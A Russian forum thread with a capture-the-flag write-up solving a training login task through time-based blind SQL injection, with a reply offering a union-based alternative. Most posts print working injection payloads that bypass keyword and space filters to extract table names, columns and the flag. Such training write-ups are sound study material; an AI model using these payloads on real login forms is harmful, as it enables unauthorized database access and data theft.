• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Codeby Games Решение таска Базовая авторизация 3, или как получить флаг за 5 минут при многочисленной фильтрации запросов Time Blind Based.

vov4ick

Cybercoliseum II
11.12.2022
39
104
BIT
804
Приветствую всех кто обратил внимание на эту статью. В предыдущей статье я разбирал таск Базовая авторизация 2, сегодня разберем Базовая авторизация 3 codeby.games.


Screenshot_25.png


Этот таск идентичный предыдущему таску в каком то смысле, та же форма входа, те же уязвимые параметры (здесь я не буду распыляться про это), только тип уязвимости совсем другой. Приступим сразу к делу:

Понимаем что таск будет забористый , так как уровень сложности "Сложно" в голове только одно это слепая инъекция или еще хуже слепая основанная на времени.
Подставляем нагрузку в Burp и смотрим :

test'and/**/sleep(5)--%09- Эта нагрузка базовая для проверки :

Screenshot_26.png


Вот здесь не видно, но мы обращаем внимание на время ответа. Запомните примерно это число, это будет ваш ключ в дальнейшем. Мы понимаем что здесь Time Blind Based. Так же здесь идет фильтрация /**/ пробелов и + %09

Пытаемся вывести хоть какую то инфу , я покажу как это делать с помощью Burp :
Что мы видим в этом запросе? много чего интересного. Что у нас фильтруется и select и from и where , по этому запрос будет выглядеть таким образом.
Я указал на запрос, а справа можно сравнить его и что там? отсутствуют операторы запроса. Это значит что нам нужно сделать так чтобы они присутствовали)
На этом фото я пытаюсь вытащить название первой буквы таблицы

Screenshot_28.png


Делаем самый банальный обход такой фильтрации:
Так же мы будем пользоваться таблицей ascii

Screenshot_30.png


Буква соответствует цифре и в запросе она 100 это d , так же я указал стрелочкой что у нас время ответа слишком больше, значит иньекция работает правильно и буква верная в данном случае первая буква названия базы данных.
И так со всеми запросами, перебирая цифры отправляем запросы, если ответ короткий значит цифра не наша, если происходит "задержка" цифра правильная и мы сверяем ее с таблицей. Записываем это все.

test'and/**/IF(ascii(substring((SEselectLECT/**/database()),1,1))=100,sleep(5),false)--%09- Запрос на получения первого символа названия базы данных , для получения второго символа просто добавляйте в конец запроса не 1,1 а 2,1. И так работает во всех запросах.

test' AND/**/IF(ascii(substr((SEselectLECT/**/TABLE_NAME/**/FRfromOM/**/ information_schema.TABLES/**/WHwhereERE/**/table_schema=database()/**/LIMIT/**/ 0,1),1,1))=108,sleep(5),NULL)--%09- Запрос на получения первого символа таблицы, чтобы узнать следующий мы меняем значения limit

test' AND/**/IF(ascii(substr((SEselectLECT/**/concat(column_name)/**/FRfromOM/**/ information_schema.columns/**/WHwhereERE/**/table_name='flags'/**/limit/**/0,1),1,1))=108, sleep(5),NULL)--%09- Запрос на получения названия колонки первого символа.

test' AND/**/IF(ascii(substring((SEselectLECT/**/count(*)/**/FRfromOM/**/flags/**/limit/**/0,1),1,1))=49, sleep(5),NULL)--%09- Запрос на получения количества колонок в таблице.

' AND/**/IF(ascii(substring((SEselectLECT/**/flag/**/FRfromOM/**/flags/**/limit/**/0,1),1,1))=97, sleep(5),NULL)--%09- Запрос на получения флага.

Вот здесь мы можем извлекать разными способами данные и флаг, в свое время я раскручивал в burp intruder, есть статьи по WFUZZ.
Но хотим ли мы тратить свое драгоценное время на все это?

Понимая что мы достаем флаг по букве, зная что фильтруется идем и пишем свой тампер для SQLMAP .
Нам нужен такой скрипт который будет обходить не 1 фильтрацию в запросе , а как минимум 4.
Я не претендую на великого писаря таких скриптов, но то что у меня получилось работает:

Screenshot_33.png


Просто проверяем его в работе:

_231205180547.png


_231205180635.png


_231220145622.png


В начале я все таки вытянул флаг доставая его по символу через интрудер, порядка 30 минут я доставал 30 с лишним символов флага, и сравнил его с тем что выдал sqlmap после. Результат был 100%.
Сколько времени потребовалось Sqlmap для полного дампа = 5 минут. Делайте выводы. Всем кто осилил это спасибо за внимание. Создателям тасков отдельная благодарность.
 

Вложения

  • _231205180724.png
    _231205180724.png
    33,3 КБ · Просмотры: 542
Последнее редактирование:

jet

One Level
22.11.2023
1
1
BIT
100
Всё круто! Флаг на последнем скрине не везде скрыт.
 
Последнее редактирование:
  • Нравится
Реакции: D3L1F3R

Logas

Grey Team
23.04.2023
203
97
BIT
495
а смысл писать тамперы если уже есть для таких задач?
 

Logas

Grey Team
23.04.2023
203
97
BIT
495
Я показал пример как можно это сделать самому, мозги тоже иногда включать нужно. А не брать готовое с полочки.
Неа, это называется изобрел велосипед. Применять мозги нужно, когда сталкиваешься с ситуацией, когда ничего готового нет. Вот это было бы интересно почитать
Раз на то пошло, то зачем ты sqlmap использовал, напиши скрипт с 0 тогда.
 

vov4ick

Cybercoliseum II
11.12.2022
39
104
BIT
804
Неа, это называется изобрел велосипед. Применять мозги нужно, когда сталкиваешься с ситуацией, когда ничего готового нет. Вот это было бы интересно почитать
Раз на то пошло, то зачем ты sqlmap использовал, напиши скрипт с 0 тогда.
Не интересно не читай
 
  • Нравится
Реакции: jet

art_rnd82

New member
03.12.2023
1
1
BIT
14
Всем добрый день!
У меня получилось достать флаг простым union base sqli
сначала получаем имя БД
Код:
login=test'/**/uniunionon/**/(selselectect/**/database(),1,1)/**/limit/**/1,1--%09&password=test
Имена таблиц
Код:
login=test'/**/uniunionon/**/(selselectect/**/(selselectect/**/group_concat(table_name)/**/frfromom/**/information_schema.tables/**/whewherere/**/table_schema=database()),1,1)/**/limit/**/1,1--%09&password=test
Получаем имя столбцов
Код:
login=test'/**/uniunionon/**/(selselectect/**/(selselectect/**/group_concat(column_name)/**/frfromom/**/information_schema.columns/**/whewherere/**/table_name="flags"),1,1)/**/limit/**/1,1--%09&password=test
Достаем флаг
Код:
login=test'/**/uniunionon/**/(selselectect/**/(selselectect/**/group_concat(flag)/**/frfromom/**/flags),1,1)/**/limit/**/1,1--%09&password=test
 
  • Нравится
Реакции: vov4ick

vov4ick

Cybercoliseum II
11.12.2022
39
104
BIT
804
Всем добрый день!
У меня получилось достать флаг простым union base sqli
сначала получаем имя БД
Код:
login=test'/**/uniunionon/**/(selselectect/**/database(),1,1)/**/limit/**/1,1--%09&password=test
Имена таблиц
Код:
login=test'/**/uniunionon/**/(selselectect/**/(selselectect/**/group_concat(table_name)/**/frfromom/**/information_schema.tables/**/whewherere/**/table_schema=database()),1,1)/**/limit/**/1,1--%09&password=test
Получаем имя столбцов
Код:
login=test'/**/uniunionon/**/(selselectect/**/(selselectect/**/group_concat(column_name)/**/frfromom/**/information_schema.columns/**/whewherere/**/table_name="flags"),1,1)/**/limit/**/1,1--%09&password=test
Достаем флаг
Код:
login=test'/**/uniunionon/**/(selselectect/**/(selselectect/**/group_concat(flag)/**/frfromom/**/flags),1,1)/**/limit/**/1,1--%09&password=test
Да, вернулся к этому таску. видать я пошел через самый тернистый путь. Попробовал через union и все работает. Спасибо за решение этим методом.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!